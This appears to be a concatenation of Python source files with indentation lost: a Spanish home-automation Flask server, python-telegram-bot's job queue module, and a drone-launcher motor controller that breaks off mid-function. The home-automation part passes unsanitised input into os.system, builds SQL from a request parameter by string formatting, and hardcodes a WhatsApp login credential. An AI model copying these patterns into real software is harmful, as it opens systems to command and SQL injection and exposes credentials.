print("entra")
while True:
if task_lights_on:
current_time = getCurrentTime()
if light_status=="off":
print(current_time)
print(time_lights_on)
if time_lights_on[0:5]==current_time and light_status=="off":
ser.write("LIGHT_ON_L1")
time.sleep(1)
print("LIGHT_ON_L1")
conn = engine.connect()
conn.execute("""UPDATE task SET status=%s WHERE appliance_id = %s""", (0,appliance_task))
#conn.commit()
conn.close()
light_status="on"
break
def daemon3():
print("running task lights off")
conn = engine.connect()
query="select time from task where name=%s and appliance_id=%s and status=%s limit 1"
rows= conn.execute(query,('task_light_off',appliance_task,1))
conn.close()
#rows = cursor.fetchall()
light_status="on"
for row in rows:
task_lights_off=True
time_lights_off = row[0]
print(time_lights_off)
while True:
if task_lights_off:
current_time = getCurrentTime()
if light_status=="on":
print(current_time)
print(time_lights_off)
if time_lights_off[0:5]==current_time and light_status=="on":
ser.write("LIGHT_OFF_L1")
print("LIGHT_OFF_L1")
conn = engine.connect()
conn.execute("""UPDATE task SET status=%s WHERE appliance_id = %s""", (0,appliance_task))
#conn.commit()
conn.close()
light_status="off"
break
def sendWhatsappMessage(msg):
print("enviando Whatsapp")
os.system("yowsup-cli demos -l 595992871584:AKpAWiC0CE48/dMw9WUCFhaCDqY= -s 595985991956 '"+msg+"'")
def sendTelegramMessage(mensaje,alert_type):
if alert_type==1:
camera.start_preview()
time.sleep(1)
camera.capture('/home/pi/intruso.jpg')
camera.stop_preview()
subprocess.call(["./tg.sh", "Domo_home", mensaje])
else:
subprocess.call(["./tg2.sh", "Domo_home", mensaje])
def changeAlarmStatus(alarm_type,alarm_status,sensor_id):
ser.write(alarm_type)
print(alarm_type)
conn = engine.connect()
conn.execute("""UPDATE sensor SET status=%s WHERE id = %s""", (alarm_status,sensor_id))
#conn.commit()
conn.close()
def getCurrentTime():
timenow= time.time() - 60*60
#m2=time.strftime("%I:%M")
currenttime =time.strftime("%I:%M",time.localtime(timenow))
#currenttime =time.strftime("%I:%M")
return currenttime
#if currenttime >= "10:00" and currenttime <= "13:00":
# if m2 >= "10:00" and m2 >= "12:00":
# m2 = ("""%s%s""" % (m2, " AM"))
# else:
# m2 = ("""%s%s""" % (m2, " PM"))
#else:
# m2 = ("""%s%s""" % (m2, " PM"))
##m2 = datetime.datetime.strptime(m2, '%I:%M %p')
#m2 = m2.strftime("%H:%M %p")
#m2 = m2[:-3]
#return m2
@app.route("/voiceCommand", methods=['POST'])
def voiceCommand():
json = collections.OrderedDict()
voz=request.form['voice']
pro=request.form['pid']
print(voz)
if voz:
music = None
ser.write("TEMPERATURA")
time.sleep(1)
ser_data=ser.readline()
status=1
if voz == "temperatura":
if len(ser_data) == 0 or ser_data.strip().isdigit()==False:
os.system('./texto_a_voz.sh '+ ' Temperatura no disponible')
else:
temperatura=ser_data
os.system('./texto_a_voz.sh Temperatura, '+str(ser_data).strip()+' grados')
#os.system('./texto_a_voz.sh grados')
if voz == "hola":
os.system('./texto_a_voz.sh Hola, que tal')
if voz == "activar alarma":
os.system('./texto_a_voz.sh Alarma, activada')
if voz == "quien sos":
os.system('./texto_a_voz.sh Hola, soy el sistema domótico!')
if voz == "musica":
os.system('./texto_a_voz.sh Que empiece la fiesta!')
music = Popen('mpg321 /usr/local/domotica/domotica_web_client/happy.mp3', stdout=subprocess.PIPE,
shell=True, preexec_fn=os.setsid)
pro = music.pid
#music = os.popen('mpg321 /usr/local/domotica/domotica_web_client/happy.mp3', 'w')
if voz == "parar musica":
os.killpg(os.getpgid(int(pro)), signal.SIGTERM)
if voz == "luces":
ser.write("LIGHT_ON_L1")
time.sleep(2)
ser.write("LIGHT_ON_L2")
time.sleep(1)
if voz == "apagar luces":
ser.write("LIGHT_OFF_L1")
time.sleep(2)
ser.write("LIGHT_OFF_L2")
time.sleep(1)
json["status"] = 1
json["pid"] = pro
json["msg"] = "ok"
return JSON.dumps(json)
@app.route("/task_list")
def task_list():
userRole = session.get('userRole')
validRole = isRoleValid(userRole)
conn = engine.connect()
query = "select t.id, t.name, t.description, t.create_date, t.time, t.status, t.task_type_id, a.name, app.name from task t inner join area a on t.area_id = a.id inner join appliance app on t.appliance_id = app.id"
#"select t.id, t.name, t.description, t.create_date, t.time, t.status, t.task_type_id, a.name, app.name from task t inner join area a on t.area_id = a.id inner join appliance app on t.appliance_id = app.id;"
rows=conn.execute(query)
conn.close()
#rows = cursor.fetchall()
task_list = []
for row in rows:
d = collections.OrderedDict()
d['id'] = row[0]
# d['name'] = row[1]
d['description'] = row[2]
d['creationDate'] = str(row[3])
d['time'] = str(row[4])
d['status'] = row[5]
d['area'] = row[7]
d['appliance'] = row[8]
d['validRole'] = validRole
task_list.append(d)
#cursor.close()
if rows != None:
return JSON.dumps(task_list)
# else:
# msg = collections.OrderedDict()
# msg['status'] = 0
# msg['msg'] = "Error, no se pudo obtener la lista de tareas"
# return JSON.dumps(msg)
@app.route("/task_edit", methods=['POST'])
def task_edit():
userRole = session.get('userRole')
userCodeRole = isRoleValid(userRole)
if session.get('logged_in') != True or userCodeRole == False:
print("if Session")
print(session)
return redirect(url_for('dashboard'))
id=request.form['id']
status=request.form['status']
print(id)
conn = engine.connect()
data = conn.execute("""UPDATE task SET status=%s WHERE id=%s""", (status, id))
#conn.commit()
conn.close()
print(data)
msg = collections.OrderedDict()
if data != None:
msg['status'] = 1
msg['msg'] = "Se cambió correctamente el estado de la tarea."
else:
msg = collections.OrderedDict()
msg['status'] = 0
msg['msg'] = "No se pudo cambiar el estado de la tarea."
res = JSON.dumps(msg)
return res
@app.route("/get_active_appliances_by_areaid")
def getActiveAppliancesByAreaId():
areaId = request.args.get('areaId')
conn = engine.connect()
queryAppliance="select * from appliance where status = '{activo}' and area_id = '{areaId}'".format(activo=1,areaId=areaId)
appliance_list = []
appliance_rows=conn.execute(queryAppliance)
#appliance_rows=cursor.fetchall()
for row in appliance_rows:
appliance = collections.OrderedDict()
appliance['id'] = row[0]
appliance['name'] = row[1]
# appliance['power'] = row[2]
# appliance['description'] = str(row[3])
# appliance['fee'] = row[4 ]
# appliance['status'] = row[5]
appliance_list.append(appliance)
conn.close()
print(appliance_list)
if len(appliance_list) > 0 and appliance_list != None:
return JSON.dumps(appliance_list)
else:
print("error")
def getSerialData():
try:
if ser.is_open == 0:
ser.open()
incoming = ser.readline()
ser.close()
return incoming
except serial.serialutil.SerialException:
print("No serial data this time")
ser.close()
return ''
def getSerialConnection():
while (ser.inWaiting()>0):
try:
incoming = ser.readline()
return incoming
except serial.serialutil.SerialException:
print("No data this time")
return ''
if __name__ == "__main__":
app.run(host='0.0.0.0',threaded=True)
|
jobqueue.py
|
#!/usr/bin/env python
#
# A library that provides a Python interface to the Telegram Bot API
# Copyright (C) 2015-2017
# Leandro Toledo de Souza <devs@python-telegram-bot.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser Public License for more details.
#
# You should have received a copy of the GNU Lesser Public License
# along with this program. If not, see [http://www.gnu.org/licenses/].
"""This module contains the classes JobQueue and Job."""
import logging
import time
import warnings
import datetime
import weakref
from numbers import Number
from threading import Thread, Lock, Event
from queue import PriorityQueue, Empty
class Days(object):
MON, TUE, WED, THU, FRI, SAT, SUN = range(7)
EVERY_DAY = tuple(range(7))
class JobQueue(object):
"""This class allows you to periodically perform tasks with the bot.
Attributes:
queue (PriorityQueue):
bot (telegram.Bot):
Args:
bot (telegram.Bot): The bot instance that should be passed to the jobs
Deprecated: 5.2
prevent_autostart (Optional[bool]): Thread does not start during initialisation.
Use `start` method instead.
"""
def __init__(self, bot, prevent_autostart=None):
if prevent_autostart is not None:
warnings.warn("prevent_autostart is being deprecated, use `start` method instead.")
self.queue = PriorityQueue()
self.bot = bot
self.logger = logging.getLogger(self.__class__.__name__)
self.__start_lock = Lock()
self.__next_peek_lock = Lock() # to protect self._next_peek & self.__tick
self.__tick = Event()
self.__thread = None
""":type: Thread"""
self._next_peek = None
""":type: float"""
self._running = False
def put(self, job, next_t=None):
"""Queue a new job.
Args:
job (telegram.ext.Job): The ``Job`` instance representing the new job
next_t (Optional[int, float, datetime.timedelta, datetime.datetime, datetime.time]):
Time in or at which the job should run for the first time. This parameter will be
interpreted depending on its type.
``int`` or ``float`` will be interpreted as "seconds from now" in which the job
should run.
``datetime.timedelta`` will be interpreted as "time from now" in which the job
should run.
``datetime.datetime`` will be interpreted as a specific date and time at which the
job should run.
``datetime.time`` will be interpreted as a specific time at which the job should
run. This could be either today or, if the time has already passed, tomorrow.
"""
warnings.warn("'JobQueue.put' is being deprecated, use 'JobQueue.run_once', "
"'JobQueue.run_daily' or 'JobQueue.run_repeating' instead")
if job.job_queue is None:
job.job_queue = self
self._put(job, next_t=next_t)
def _put(self, job, next_t=None, last_t=None):
"""Queue a new job.
Args:
job (telegram.ext.Job): The ``Job`` instance representing the new job
next_t (Optional[int, float, datetime.timedelta, datetime.datetime, datetime.time]):
Time in or at which the job should run for the first time. This parameter will be
interpreted depending on its type.
* ``int`` or ``float`` will be interpreted as "seconds from now" in which the job
should run.
* ``datetime.timedelta`` will be interpreted as "time from now" in which the job
should run.
* ``datetime.datetime`` will be interpreted as a specific date and time at which
the job should run.
* ``datetime.time`` will be interpreted as a specific time of day at which the job
should run. This could be either today or, if the time has already passed,
tomorrow.
last_t (Optional[float]): Timestamp of the time when ``job`` was scheduled for in the
last ``put`` call. If provided, it will be used to calculate the next timestamp
more accurately by accounting for the execution time of the job (and possibly
others). If None, `now` will be assumed.
"""
if next_t is None:
next_t = job.interval
if next_t is None:
raise ValueError('next_t is None')
if isinstance(next_t, datetime.datetime):
next_t = (next_t - datetime.datetime.now()).total_seconds()
elif isinstance(next_t, datetime.time):
next_datetime = datetime.datetime.combine(datetime.date.today(), next_t)
if datetime.datetime.now().time() > next_t:
next_datetime += datetime.timedelta(days=1)
next_t = (next_datetime - datetime.datetime.now()).total_seconds()
elif isinstance(next_t, datetime.timedelta):
next_t = next_t.total_seconds()
next_t += last_t or time.time()
self.logger.debug('Putting job %s with t=%f', job.name, next_t)
self.queue.put((next_t, job))
# Wake up the loop if this job should be executed next
self._set_next_peek(next_t)
def run_once(self, callback, when, context=None, name=None):
"""Creates a new ``Job`` that runs once and adds it to the queue.
Args:
callback (function): The callback function that should be executed by the new job. It
should take two parameters ``bot`` and ``job``, where ``job`` is the ``Job``
instance. It can be used to access it's ``context`` or change it to a repeating
job.
when (int, float, datetime.timedelta, datetime.datetime, datetime.time):
Time in or at which the job should run. This parameter will be interpreted
depending on its type.
* ``int`` or ``float`` will be interpreted as "seconds from now" in which the job
should run.
* ``datetime.timedelta`` will be interpreted as "time from now" in which the job
should run.
* ``datetime.datetime`` will be interpreted as a specific date and time at which
the job should run.
* ``datetime.time`` will be interpreted as a specific time of day at which the job
should run. This could be either today or, if the time has already passed,
tomorrow.
context (Optional[object]): Additional data needed for the callback function. Can be
accessed through ``job.context`` in the callback. Defaults to ``None``
name (Optional[str]): The name of the new job. Defaults to ``callback.__name__``
Returns:
telegram.ext.jobqueue.Job: The new ``Job`` instance that has been added to the
job queue.
"""
job = Job(callback, repeat=False, context=context, name=name, job_queue=self)
self._put(job, next_t=when)
return job
def run_repeating(self, callback, interval, first=None, context=None, name=None):
"""Creates a new ``Job`` that runs once and adds it to the queue.
Args:
callback (function): The callback function that should be executed by the new job. It
should take two parameters ``bot`` and ``job``, where ``job`` is the ``Job``
instance. It can be used to access it's ``context``, terminate the job or change
its interval.
interval (int, float, datetime.timedelta): The interval in which the job will run.
If it is an ``int`` or a ``float``, it will be interpreted as seconds.
first (int, float, datetime.timedelta, datetime.datetime, datetime.time):
* ``int`` or ``float`` will be interpreted as "seconds from now" in which the job
should run.
* ``datetime.timedelta`` will be interpreted as "time from now" in which the job
should run.
* ``datetime.datetime`` will be interpreted as a specific date and time at which
the job should run.
* ``datetime.time`` will be interpreted as a specific time of day at which the job
should run. This could be either today or, if the time has already passed,
tomorrow.
Defaults to ``interval``
context (Optional[object]): Additional data needed for the callback function. Can be
accessed through ``job.context`` in the callback. Defaults to ``None``
name (Optional[str]): The name of the new job. Defaults to ``callback.__name__``
Returns:
telegram.ext.jobqueue.Job: The new ``Job`` instance that has been added to the
job queue.
"""
job = Job(callback,
interval=interval,
repeat=True,
context=context,
name=name,
job_queue=self)
self._put(job, next_t=first)
return job
def run_daily(self, callback, time, days=Days.EVERY_DAY, context=None, name=None):
"""Creates a new ``Job`` that runs once and adds it to the queue.
Args:
callback (function): The callback function that should be executed by the new job. It
should take two parameters ``bot`` and ``job``, where ``job`` is the ``Job``
instance. It can be used to access it's ``context`` or terminate the job.
time (datetime.time): Time of day at which the job should run.
days (Optional[tuple[int]]): Defines on which days of the week the job should run.
Defaults to ``Days.EVERY_DAY``
context (Optional[object]): Additional data needed for the callback function. Can be
accessed through ``job.context`` in the callback. Defaults to ``None``
name (Optional[str]): The name of the new job. Defaults to ``callback.__name__``
Returns:
telegram.ext.jobqueue.Job: The new ``Job`` instance that has been added to the
job queue.
"""
job = Job(callback,
interval=datetime.timedelta(days=1),
repeat=True,
days=days,
context=context,
name=name,
job_queue=self)
self._put(job, next_t=time)
return job
def _set_next_peek(self, t):
"""
Set next peek if not defined or `t` is before next peek.
In case the next peek was set, also trigger the `self.__tick` event.
"""
with self.__next_peek_lock:
if not self._next_peek or self._next_peek > t:
self._next_peek = t
self.__tick.set()
def tick(self):
"""
Run all jobs that are due and re-enqueue them with their interval.
"""
now = time.time()
self.logger.debug('Ticking jobs with t=%f', now)
while True:
try:
t, job = self.queue.get(False)
except Empty:
break
self.logger.debug('Peeked at %s with t=%f', job.name, t)
if t > now:
# We can get here in two conditions:
# 1. At the second or later pass of the while loop, after we've already
# processed the job(s) we were supposed to at this time.
# 2. At the first iteration of the loop only if `self.put()` had triggered
# `self.__tick` because `self._next_peek` wasn't set
self.logger.debug("Next task isn't due yet. Finished!")
self.queue.put((t, job))
self._set_next_peek(t)
break
if job.removed:
self.logger.debug('Removing job %s', job.name)
continue
if job.enabled:
try:
current_week_day = datetime.datetime.now().weekday()
if any(day == current_week_day for day in job.days):
self.logger.debug('Running job %s', job.name)
job.run(self.bot)
except:
self.logger.exception('An uncaught error was raised while executing job %s',
job.name)
else:
self.logger.debug('Skipping disabled job %s', job.name)
if job.repeat and not job.removed:
self._put(job, last_t=t)
else:
self.logger.debug('Dropping non-repeating or removed job %s', job.name)
def start(self):
"""
Starts the job_queue thread.
"""
self.__start_lock.acquire()
if not self._running:
self._running = True
self.__start_lock.release()
self.__thread = Thread(target=self._main_loop, name="job_queue")
self.__thread.start()
self.logger.debug('%s thread started', self.__class__.__name__)
else:
self.__start_lock.release()
def _main_loop(self):
"""
Thread target of thread ``job_queue``. Runs in background and performs ticks on the job
queue.
"""
while self._running:
# self._next_peek may be (re)scheduled during self.tick() or self.put()
with self.__next_peek_lock:
tmout = self._next_peek - time.time() if self._next_peek else None
self._next_peek = None
self.__tick.clear()
self.__tick.wait(tmout)
# If we were woken up by self.stop(), just bail out
if not self._running:
break
self.tick()
self.logger.debug('%s thread stopped', self.__class__.__name__)
def stop(self):
"""
Stops the thread
"""
with self.__start_lock:
self._running = False
self.__tick.set()
if self.__thread is not None:
self.__thread.join()
def jobs(self):
"""Returns a tuple of all jobs that are currently in the ``JobQueue``"""
return tuple(job[1] for job in self.queue.queue if job)
class Job(object):
"""This class encapsulates a Job
Attributes:
callback (function): The function that the job executes when it's due
interval (int, float, datetime.timedelta): The interval in which the job runs
days (tuple[int]): A tuple of ``int`` values that determine on which days of the week the
job runs
repeat (bool): If the job runs periodically or only once
name (str): The name of this job
job_queue (telegram.ext.JobQueue): The ``JobQueue`` this job belongs to
enabled (bool): Boolean property that decides if this job is currently active
Args:
callback (function): The callback function that should be executed by the Job. It should
take two parameters ``bot`` and ``job``, where ``job`` is the ``Job`` instance. It
can be used to terminate the job or modify its interval.
interval (Optional[int, float, datetime.timedelta]): The interval in which the job will
execute its callback function. ``int`` and ``float`` will be interpreted as seconds.
If you don't set this value, you must set ``repeat=False`` and specify ``next_t`` when
you put the job into the job queue.
repeat (Optional[bool]): If this job should be periodically execute its callback function
(``True``) or only once (``False``). Defaults to ``True``
context (Optional[object]): Additional data needed for the callback function. Can be
accessed through ``job.context`` in the callback. Defaults to ``None``
days (Optional[tuple[int]]): Defines on which days of the week the job should run.
Defaults to ``Days.EVERY_DAY``
name (Optional[str]): The name of this job. Defaults to ``callback.__name__``
job_queue (Optional[class:`telegram.ext.JobQueue`]): The ``JobQueue`` this job belongs to.
Only optional for backward compatibility with ``JobQueue.put()``.
"""
def __init__(self,
callback,
interval=None,
repeat=True,
context=None,
days=Days.EVERY_DAY,
name=None,
job_queue=None):
self.callback = callback
self.context = context
self.name = name or callback.__name__
self._repeat = repeat
self._interval = None
self.interval = interval
self.repeat = repeat
self._days = None
self.days = days
self._job_queue = weakref.proxy(job_queue) if job_queue is not None else None
self._remove = Event()
self._enabled = Event()
self._enabled.set()
def run(self, bot):
"""Executes the callback function"""
self.callback(bot, self)
def schedule_removal(self):
"""
Schedules this job for removal from the ``JobQueue``. It will be removed without executing
its callback function again.
"""
self._remove.set()
@property
def removed(self):
return self._remove.is_set()
@property
def enabled(self):
return self._enabled.is_set()
@enabled.setter
def enabled(self, status):
if status:
self._enabled.set()
else:
self._enabled.clear()
@property
def interval(self):
return self._interval
@interval.setter
def interval(self, interval):
if interval is None and self.repeat:
raise ValueError("The 'interval' can not be 'None' when 'repeat' is set to 'True'")
if not (interval is None or isinstance(interval, (Number, datetime.timedelta))):
raise ValueError("The 'interval' must be of type 'datetime.timedelta',"
" 'int' or 'float'")
self._interval = interval
@property
def interval_seconds(self):
if isinstance(self.interval, datetime.timedelta):
return self.interval.total_seconds()
else:
return self.interval
@property
def repeat(self):
return self._repeat
@repeat.setter
def repeat(self, repeat):
if self.interval is None and repeat:
raise ValueError("'repeat' can not be set to 'True' when no 'interval' is set")
self._repeat = repeat
@property
def days(self):
return self._days
@days.setter
def days(self, days):
if not isinstance(days, tuple):
raise ValueError("The 'days' argument should be of type 'tuple'")
if not all(isinstance(day, int) for day in days):
raise ValueError("The elements of the 'days' argument should be of type 'int'")
if not all(0 <= day <= 6 for day in days):
raise ValueError("The elements of the 'days' argument should be from 0 up to and "
"including 6")
self._days = days
@property
def job_queue(self):
""" :rtype: JobQueue """
return self._job_queue
@job_queue.setter
def job_queue(self, job_queue):
# Property setter for backward compatibility with JobQueue.put()
if not self._job_queue:
self._job_queue = weakref.proxy(job_queue)
else:
raise RuntimeError("The 'job_queue' attribute can only be set once.")
def __lt__(self, other):
return False
|
DLQ.py
|
#DRONE LAUNCHER
from flask import Flask, render_template, request, jsonify
from roboclaw import Roboclaw
import time
import socket
try:
from neopixel import *
except ImportError:
print("Failure to load Neoplixels")
import argparse
##import threading
try:
import thermo
except IndexError:
print("Failure to find DS18B20")
try:
import MPU9250
except OSError:
print("Remote I/O Error - MPU 92/65")
import RPi.GPIO as GPIO
from time import sleep
from threading import Thread, Event
# LED strip configuration:
LED_COUNT = 60 # Number of LED pixels.
LED_PIN = 18 # GPIO pin connected to the pixels (18 uses PWM!).
#LED_PIN = 10 # GPIO pin connected to the pixels (10 uses SPI /dev/spidev0.0).
LED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)
LED_DMA = 10 # DMA channel to use for generating signal (try 10)
LED_BRIGHTNESS = 255 # Set to 0 for darkest and 255 for brightest
LED_INVERT = False # True to invert the signal (when using NPN transistor level shift)
LED_CHANNEL = 0 # set to '1' for GPIOs 13, 19, 41, 45 or 53
# Create NeoPixel object with appropriate configuration.
try:
strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS, LED_CHANNEL)
except NameError:
print("'Adafruit_Neopixel not defined - strip failed to set up'")
#Setup for the pins for threading the lights and the sound
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(23, GPIO.OUT, initial = GPIO.LOW) #Sound
GPIO.setup(24, GPIO.OUT, initial = GPIO.LOW) #Lights
# Define functions which animate LEDs in various ways.
def colorWipe(strip, color, wait_ms=50):
"""Wipe color across display a pixel at a time."""
for i in range(strip.numPixels()):
strip.setPixelColor(i, color)
strip.show()
#time.sleep(wait_ms/1000.0) #This sleep in case we want to have a longer intervall between each led lighting
#Function to thread the lights and the sound while the motor is moving
def relay_activate():
while True:
event.wait()
while event.is_set():
GPIO.output(24, GPIO.HIGH)
GPIO.output(23, GPIO.HIGH)
sleep(1)
GPIO.output(24, GPIO.LOW)
GPIO.output(23, GPIO.LOW)
try:
colorWipe(strip, Color(0, 255, 0))
except NameError:
print("Unable to set strip to red")
sleep(1)
try:
colorWipe(strip, Color(255, 255, 255))
except NameError:
print("Unable to set strip to white")
#Open serial port
#Linux comport name
rc = Roboclaw("/dev/ttyACM0",115200)
#Windows comport name
# rc = Roboclaw("COM8",115200)
"""Here it would be good to have LEDs switch on to confirm connection to each roboclaw"""
rc.Open()
#Declare variables
#Specify IP address and port for the server
host=(([ip for ip in socket.gethostbyname_ex(socket.gethostname())[2] if not ip.startswith("127.")] or [[(s.connect(("8.8.8.8", 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]]) + ["no IP found"])[0]
port=5000
address = 0x80 #Controller 1, M1=Pitch, M2=Rotation
address_2 = 0x81 #Controller 2, M1=Lift, M2=Launch
address_3 = 0x82 #Controller 3, M1=Case Open, M2=Case Close
pitch_pulses=355000 #Encoder pulses from the linear actuator
pitch_length=90.0 #Degrees 0 -> 90 degrees (0 vertical, 90 horizontal)
pitch_speed_pulses=7000 #Pulses per second
pitch_speed_manual=127 #From 0 to 127
pitch_ready=65.0 #Pitch degrees for the launch (temporary) 0 is 90 -> 65 is 25
rotation_pulses=950000 #Encoder pulses from the rotation motor
rotation_length=180.0 #Degrees
rotation_speed_pulses=16000 #Pulses per second
rotation_speed_manual=15 #From 0 to 127 - TEST BEFORE INCREASING SPEED -> 15 IS REASONABLE -> POTENTIAL RUNAWAY SPEED IF INCREASED
rotation_ready=5.0 #Rotation degress for the launch (temporary)
lift_pulses=19000 #Encoder pulses from the lifting colum
lift_length=130.0 #cm
lift_speed_pulses=420 #Pulses per second
lift_speed_manual=127 #From 0 to 127
##lift_ready=lift_length #Lift lenght for the launch (temporary)
lift_ready = 20.0 #INDOOR testing extension. Comment out this line and use above line if outside.
launch_pulses=14098 #Encoder pulses from the launch motor - 106 cm
launch_length=106.0 #cm
launch_speed_pulses=6*13400 #Pulses per second during launch (145000 max) (13400 pulses/m)
launch_speed_pulses_slow=2500 #Pulses per second during preparation
launch_speed_manual=15 #From 0 to 127
launch_acceleration=(launch_speed_pulses**2)/13400 #Acceleration during launch (pulses/second2)
launch_max_speed=10 #Maximum launch speed
launch_min_speed=1 #Minimum launch speed
launch_max_acceleration=48 #Maximum launch acceleration
launch_min_acceleration=1 #Minimum launch acceleration
launch_standby=7335 #Drone position during stand-by - 55 cm
launch_mount=16359 #Drone position during mounting - 123 cm
launch_break=20335 #Belt position during breaking - 153 cm
launch_bottom=0 #Drone position at the back part of the capsule - 0 cm
launch_connect=2190 #Belt position for touching the upper part - 16.5 cm
"""seemingly useless encoders_ready safety"""
encoders_ready = 0 #At the beggining, the encoders are not ready
#Create an instance of the Flask class for the web app
app = Flask(__name__)
##app.debug = True
#Render HTML template
@app.route("/")
def index():
return render_template('dronelauncher_web_test.html')
#Motor controller functions
try:
rc.ForwardM2(address, rotation_speed_manual)
rc.ForwardM2(address,0) #Both commands are used to avoid rotation
except AttributeError:
print("'Roboclaw' object has no attribute '_port' -> FAILURE TO DETECT ROBOCLAW")
@app.route('/app_pitch_up', methods=['POST'])
def function_pitch_up():
event.set()
rc.ForwardM1(address, pitch_speed_manual)
return (''), 204 #Returns an empty response
@app.route('/app_pitch_down', methods=['POST'])
def function_pitch_down():
event.set()
rc.BackwardM1(address, pitch_speed_manual)
return (''), 204
@app.route('/app_pitch_position', methods=['POST'])
def function_pitch_position():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
event.set()
pitch_position = request.form.get('pitch_position', type=int)
if pitch_position > pitch_length or pitch_position < 0:
return (''), 400
elif pitch_position == 0:
pitch_objective = 0
else:
pitch_objective = int(pitch_pulses/(pitch_length/pitch_position))
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_pitch_stop', methods=['POST'])
def function_pitch_stop():
rc.ForwardM1(address,0)
event.clear()
sleep(0.02)
return (''), 204
@app.route('/app_rotation_right', methods=['POST'])
def function_rotation_right():
event.set()
rc.ForwardM2(address, rotation_speed_manual)
return (''), 204
@app.route('/app_rotation_left', methods=['POST'])
def function_rotation_left():
event.set()
rc.BackwardM2(address, rotation_speed_manual)
return (''), 204
@app.route('/app_rotation_position', methods=['POST'])
def function_rotation_position():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
event.set()
rotation_position = request.form.get('rotation_position', type=int)
if rotation_position > rotation_length or rotation_position < -rotation_length:
return (''), 400
elif rotation_position == 0:
rotation_objective = 0
else:
rotation_objective = int((rotation_pulses/(rotation_length/rotation_position))/2)
rotation_actual = rc.ReadEncM2(address)[1]
rotation_increment = rotation_objective-rotation_actual
if rotation_increment >= 0:
rc.SpeedDistanceM2(address,rotation_speed_pulses,rotation_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
else:
rc.SpeedDistanceM2(address,-rotation_speed_pulses,-rotation_increment,1)
rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_rotation_stop', methods=['POST'])
def function_rotation_stop():
rc.ForwardM2(address,0)
event.clear()
sleep(0.02)
return (''), 204
@app.route('/app_lift_up', methods=['POST'])
def function_lift_up():
event.set()
rc.ForwardM1(address_2, lift_speed_manual)
return (''), 204
@app.route('/app_lift_down', methods=['POST'])
def function_lift_down():
event.set()
rc.BackwardM1(address_2, lift_speed_manual)
return (''), 204
@app.route('/app_lift_position', methods=['POST'])
def function_lift_position():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
event.set()
lift_position = request.form.get('lift_position', type=int)
if lift_position > lift_length or lift_position < 0:
return (''), 400
elif lift_position == 0:
lift_objective = 0
else:
lift_objective = int(lift_pulses/(lift_length/lift_position))
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_lift_stop', methods=['POST'])
def function_lift_stop():
rc.ForwardM1(address_2,0)
event.clear()
sleep(0.02)
return (''), 204
@app.route('/app_launch_forwards', methods=['POST'])
def function_launch_forwards():
event.set()
rc.ForwardM2(address_2, launch_speed_manual)
#rc.SpeedM2(address_2,launch_speed_pulses_slow) #Using the speed control instead of the duty cycle because the friction changes in the tube
return (''), 204
@app.route('/app_launch_backwards', methods=['POST'])
def function_launch_backwards():
event.set()
rc.BackwardM2(address_2, launch_speed_manual)
#rc.SpeedM2(address_2,-launch_speed_pulses_slow) #Using the speed control instead of the duty cycle because the friction changes in the tube
return (''), 204
@app.route('/app_launch_position', methods=['POST'])
def function_launch_position():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
event.set()
launch_position = request.form.get('launch_position', type=int)
if launch_position > launch_length or launch_position < 0:
return (''), 400
else:
launch_objective = launch_bottom
launch_actual = rc.ReadEncM2(address_2)[1]
launch_increment = launch_objective-launch_actual
if launch_increment >= 0:
rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
buffer_2 = (0,0,0)
while(buffer_2[2]!=0x80): #Loop until all movements are completed
buffer_2 = rc.ReadBuffers(address_2)
if launch_position == 0:
launch_objective = 0
else:
launch_objective = int(launch_pulses/(launch_length/launch_position))
launch_actual = rc.ReadEncM2(address_2)[1]
launch_increment = launch_objective-launch_actual #+launch_connect
if launch_increment >= 0:
rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
else:
rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,0)
